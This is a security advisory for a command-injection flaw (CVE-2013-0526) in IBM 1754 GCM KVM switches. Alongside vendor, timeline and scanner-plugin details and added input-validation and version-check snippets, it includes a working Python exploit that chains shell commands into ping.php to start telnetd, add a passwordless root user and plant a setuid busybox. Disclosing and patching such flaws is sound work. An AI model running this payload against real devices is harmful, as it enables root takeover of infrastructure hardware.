ID PACKETSTORM:122843 Type packetstorm Reporter Alejandro Alvarez Bravo Modified 2013-08-16T00:00:00
I. Product description
The IBM 1754 GCM family provides KVM over IP and serial console management
technology in a single appliance.
II. Vulnerability information
Impact: Command execution
Remotely exploitable: yes
CVE: 2013-0526
CVSS score: 8.5
III. Vulnerability details
GCM16 (v.1.18.0.22011) and older versions of this KVM switch contain a flaw
that allows a remote authenticated user to execute unauthorized commands as
root.

This flaw exists because web application variables are not sanitised. In this
case, the $count and $size parameters of ping.php are passed unescaped into
an exec() call, so a specially crafted request can append shell metacharacters
and arbitrary commands, which then run on the KVM's embedded Linux.
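As an added defensive illustration (not code from the advisory, and not IBM's ping.php, whose source is not shown here), the following Python 3 snippet contrasts the string-building pattern described above with a hardened version: the address, count and size values are validated as an IP literal and bounded integers before use, and the ping command is assembled as an argv list so that no shell ever parses them. The limits MAX_COUNT and MAX_SIZE, the function names and the sample inputs are assumptions for the example.

```python
import ipaddress
import re

# Bounds are assumptions for this example; the advisory does not give ping.php's real limits.
MAX_COUNT = 10      # maximum number of echo requests per call
MAX_SIZE = 1472     # maximum payload size in bytes that fits an ordinary Ethernet MTU


class InvalidPingParameter(ValueError):
    """Raised when a ping.php-style request parameter fails validation."""


def validate_ping_params(address, count, size):
    """Return (address, count, size) as typed values or raise InvalidPingParameter.

    count and size must be plain decimal digit strings within bounds, so a
    value such as "1 ; echo injected" is rejected outright; address must be
    an IPv4/IPv6 literal. Nothing here is ever handed to a shell.
    """
    if not re.fullmatch(r"[0-9]{1,4}", count):
        raise InvalidPingParameter("count must be 1-4 decimal digits")
    if not re.fullmatch(r"[0-9]{1,5}", size):
        raise InvalidPingParameter("size must be 1-5 decimal digits")
    n_count, n_size = int(count), int(size)
    if not 1 <= n_count <= MAX_COUNT:
        raise InvalidPingParameter("count out of range")
    if not 0 <= n_size <= MAX_SIZE:
        raise InvalidPingParameter("size out of range")
    try:
        ip = ipaddress.ip_address(address)
    except ValueError:
        raise InvalidPingParameter("address must be an IP literal") from None
    return str(ip), n_count, n_size


def unsafe_shell_command(address, count, size):
    """The vulnerable pattern: raw parameters concatenated into one command
    string destined for a shell-based exec(). This only returns the string so
    the effect of metacharacters is visible; it never runs anything."""
    return "ping -c %s -s %s %s" % (count, size, address)


def build_ping_argv(address, count, size):
    """Hardened pattern: validate first, then build an argv list. With no shell
    in the path, ';' and friends could only ever be literal argument text, and
    validation has already refused them anyway."""
    ip, n_count, n_size = validate_ping_params(address, count, size)
    return ["ping", "-c", str(n_count), "-s", str(n_size), ip]


if __name__ == "__main__":
    # Constructed sample requests: one benign, one carrying a chained command.
    for req in [("192.0.2.1", "1", "56"), ("192.0.2.1", "1 ; echo injected", "56")]:
        print("unsafe string :", unsafe_shell_command(*req))
        try:
            print("hardened argv :", build_ping_argv(*req))
        except InvalidPingParameter as exc:
            print("hardened argv : rejected (%s)" % exc)
```

The same idea applies in PHP: cast or pattern-match count and size to integers, validate the address with filter_var() as an IP, and pass each value through escapeshellarg() if a shell command string cannot be avoided.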
IV. Proof of concept
The following simple exploit leads to root access on the device: it starts a
telnet daemon and creates a new user with root privileges and no password
(sessid and target are hard-coded and must be changed for it to work):
#!/usr/bin/python
"""
This exploit for Avocent KVM switch allows to gain root access to embedded
device. SessionId (avctSessionId) is necessary for this to work, so you
need a valid user. Default user is "Admin" with blank password.

After running exploit, connect using telnet to device with user target
(pass: target) then do "/tmp/su - superb" to gain root
"""
from StringIO import StringIO
import pycurl
import re

sessid = "XXXXXXXXX"                     # valid avctSessionId cookie value
target = "https://ip.of.kvm/ping.php"    # URL of the vulnerable ping.php

# Command chained onto the ping invocation through the unsanitised parameter
command = ("/sbin/telnetd ; echo superb::0:0:owned:/:/bin/sh >> /etc/passwd"
           " ; cp /bin/busybox /tmp/su ; chmod 6755 /tmp/su ; echo done. now connect to"
           " device using telnet with user target and pass target, then \"/tmp/su -"
           " superb\"")

storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, target)
c.setopt(c.SSL_VERIFYPEER, 0)    # device ships a self-signed certificate
c.setopt(c.SSL_VERIFYHOST, 0)
c.setopt(c.WRITEFUNCTION, storage.write)
# The injected text rides in the count parameter; the *E* markers delimit
# the command output inside the returned page
c.setopt(c.POSTFIELDS, 'address=255.255.255.255&action=ping&size=56&count=1'
         ' ; echo *E* ; ' + command + ' ; echo *E*')
c.setopt(c.COOKIE, 'avctSessionId=' + sessid)

try:
    c.perform()
    c.close()
except pycurl.error:
    print ""

content = storage.getvalue()
x1 = re.search(r"\*E\*(.*)\*E\*", content)
if x1:
    print x1.group(1).replace("<br />", "\n")
else:
    print content    # markers not found: show the raw response instead
V. Vendor Response
IBM released new firmware (1.20.0.22575) that corrects this vulnerability.
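A quick inventory check, added here as an example and not code from the advisory or from the vendor: given a firmware version string as reported by a device, decide whether it predates the fixed release 1.20.0.22575. Python 3; the "GCM16 <version>" banner format, the parsing regex and the sample banners are assumptions constructed for the example.

```python
import re

FIXED_VERSION = (1, 20, 0, 22575)   # first firmware the advisory names as corrected


def parse_firmware_version(banner):
    """Pull a dotted numeric version out of a banner such as 'GCM16 1.18.0.22011'
    (constructed format). Returns a tuple of ints padded to four fields, or None."""
    m = re.search(r"\b(\d+(?:\.\d+){1,3})\b", banner)
    if not m:
        return None
    parts = tuple(int(p) for p in m.group(1).split("."))
    return parts + (0,) * (4 - len(parts))


def is_vulnerable_firmware(banner):
    """True when the reported version is older than the fixed release, False when
    it is the fixed release or newer, None when no version could be parsed.
    Missing trailing fields are padded with zeros, so a bare '1.20.0' without a
    build number is treated as older than 1.20.0.22575 rather than assumed fixed."""
    v = parse_firmware_version(banner)
    if v is None:
        return None
    return v < FIXED_VERSION


if __name__ == "__main__":
    # Constructed banners: affected build, fixed build, later build
    for b in ["GCM16 1.18.0.22011", "GCM32 1.20.0.22575", "GCM16 1.21.0.1"]:
        print(b, "->", is_vulnerable_firmware(b))
```

Treating an incomplete version as unfixed is the conservative choice for a check like this: a false positive costs a manual look at the device, while a false negative leaves a root-level command injection in place.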
VI. Timeline
2013-06-12 - Vendor (IBM PSIRT) notified.
2013-06-12 - Vendor assigns internal ID.
2013-07-02 - Vendor confirms the vulnerability.
2013-08-16 - Vulnerability disclosed and patch released.
VII. External information
Information about this vulnerability (in Spanish):
http://www.bitcloud.es/2013/08/vulnerabilidad-en-kvms-gcm1632-de-ibm.html
IBM Security Bulletin:
http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5093509
--
Alejandro Alvarez Bravo
alex.a.bravo@gmail.com
Related database entries (condensed from the record metadata that followed the
advisory)

Packet Storm: "IBM 1754 GCM16 1.18.0.22011 Command Execution", published
2013-08-16. CVSS v2 base score 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C); Bugtraq ID
61816.
https://packetstormsecurity.com/files/122843/IBM-1754-GCM16-1.18.0.22011-Command-Execution.html
Original text: https://packetstormsecurity.com/files/download/122843/IBM1754-exec.txt

CVE-2013-0526 (NVD, published 2013-08-21, CWE-20): ping.php in Global Console
Manager 16 (GCM16) and Global Console Manager 32 (GCM32) before 1.20.0.22575 on
the IBM Avocent 1754 KVM switch allows remote authenticated users to execute
arbitrary commands via shell metacharacters in the (1) count or (2) size
parameter. Affected CPEs: global_console_manager_16_firmware:1.18.0.22011 and
global_console_manager_32_firmware:1.18.0.22011.
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0526

OpenVAS OPENVAS:1361412562310103768 (Greenbone, created 2013-08-19): "IBM 1754
GCM16 and GCM32 Global Console Managers Multiple Command Execution
Vulnerabilities". The test reads the device's SNMP sysDescr (UDP 161), matches
"GCM(16|32) <version>" and calls security_message() when
version_is_less(version:vers, test_version:"1.18.0.22011") holds. Because that
comparison is strict, a device running exactly 1.18.0.22011 is not flagged even
though the plugin's own "affected" text (and this advisory) list that build as
vulnerable, and its solution text names 1.18.0.22011 as the update rather than
the vendor's 1.20.0.22575.
http://plugins.openvas.org/nasl.php?oid=1361412562310103768

Nessus plugin 77002, IBM_GCM_KVM_MIGR-5093509.NASL (Tenable, published
2014-08-05): "IBM GCM16 / GCM32 Global Console Manager KVM Switch Firmware
Version < 1.20.0.22575 Remote Code Execution". It takes the firmware version and
model gathered by ibm_gcm_kvm_detect.nbin (Host/IBM/GCM/Version,
Host/IBM/GCM/Model) and reports a hole when ver_compare() puts the version at
or below the cutoff 1.18.0.22011; solution: upgrade to firmware version
1.20.0.22575 or later.
https://www.tenable.com/plugins/nessus/77002

1337DAY-ID-21122 (0day.today, 2013-08-17) and EDB-ID:27706 (Exploit-DB,
2013-08-19) are mirrors of this advisory with identical text.
https://0day.today/exploit/description/21122
https://www.exploit-db.com/exploits/27706/